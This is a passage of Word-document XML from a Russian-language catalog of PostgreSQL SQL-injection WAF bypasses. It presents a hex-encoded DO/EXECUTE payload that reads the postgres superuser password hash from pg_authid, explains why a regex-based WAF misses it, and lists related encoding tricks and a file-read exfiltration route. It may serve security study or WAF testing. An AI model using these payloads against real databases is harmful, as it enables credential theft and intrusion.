          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT rolpassword FROM pg_authid WHERE rolname='postgres'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Сплошная hex-форма: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>53454C4543542072 6F6C70617373776F72642046524F4D2070675F61757468696420574845524520726F6C6E616D653D27706F73746772657327</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5345...7327</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C8AAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68110442" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title FROM articles LIMIT 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD4A04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D66D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0E91BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE convert_from(decode('5345...7327', 'hex'), 'UTF8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F98E0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CB3766" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В payload-тексте нет ни </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ни </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ни </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ни </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — всё закодировано. WAF из 3.9.0 пропускает (его regex-список ловит подстроки, hex-строка их не содержит).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27194A7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Доступность зависит от текущей роли — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требует SUPERUSER. См. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104AFF11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827F35D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode(text, 'hex'|'base64'|'escape')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in функция возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t>. Любые байты, включая зарезервированные для SQL-парсера, спрятаны как числовые литералы hex/base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAFF581" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(bytea, encoding)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конвертирует bytea в text в указанной кодировке. Поддерживаемые: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UTF8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LATIN1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WIN1251</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SJIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и т.д. — полный список через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_conversion</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A0A9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> редко в blacklist-ах WAF, потому что используются легитимно: API-парсинг (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode(request_body, 'base64')</w:t>
      </w:r>
      <w:r>
        <w:t>), миграции, обработка binary-данных pgcrypto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B25FE14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Hex/base64-кодирование — encoding-уровень; парсер PG видит только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode(&lt;строковый литерал&gt;, &lt;строковый литерал&gt;)</w:t>
      </w:r>
      <w:r>
        <w:t>. Опасное содержимое раскрывается только в рантайме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B912554" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A51B5BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode(text, format)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.decode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), стабильна с 8.0. Возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; для использования как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нужно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(..., 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
      <w:r>
        <w:t>-каст — но он работает только если bytea содержит valid UTF-8 в кодировке, совпадающей с server_encoding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB63D00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(bytea, name)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in, стабильна с 8.4. Принимает имя кодировки как строку; падает на невалидной последовательности байтов для указанной кодировки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694EEFF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В Payload C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE convert_from(decode(...), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартная plpgsql-конструкция; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>-выражение и динамически парсит/исполняет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1458645F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Поддержка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escape</w:t>
      </w:r>
      <w:r>
        <w:t>-формата (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode('admin\\047hash', 'escape')</w:t>
      </w:r>
      <w:r>
        <w:t>) — устарела, в современном коде не используется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F463D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   Hex-decode не требует regex-валидности hex-строки — проверка длины (чётное число hex-цифр) на этапе исполнения, ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid hexadecimal digit</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid hexadecimal data: odd number of digits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при некорректном input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B064EB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C06203D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.4+ (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стабильны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220F9DA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает везде идентично self-hosted. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t>-функции, провайдеры их не отключают (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> активно используется и в их собственных pgcrypto/binary-сценариях).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1ED851" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D896B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t>-конкатенация. Альтернативный путь для коротких строк; для длинных decode выигрывает по компактности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DC096" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Unicode-escape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'\0070\0067...'</w:t>
      </w:r>
      <w:r>
        <w:t>. Лексический путь без function call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568217DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — E-strings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'\x70\x67...'</w:t>
      </w:r>
      <w:r>
        <w:t>. Лексический путь с byte-escape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9EC79" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_binary_file()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encode(..., 'base64')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обратная операция: бинарный файл из 3.6.3 транспортируется в HTTP-ответ через base64. Симметрия с 3.9.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E51B579" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode + convert_from + EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — наиболее компактный путь скрыть identifier-payload в plpgsql-функции для обхода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t>-валидации (3.16.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FABC2C9"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\bdecode\s*\(\s*['"][0-9a-fA-F]{20,}['"]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (decode с длинной hex-строкой) нет.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7B5CA56F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C437C73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
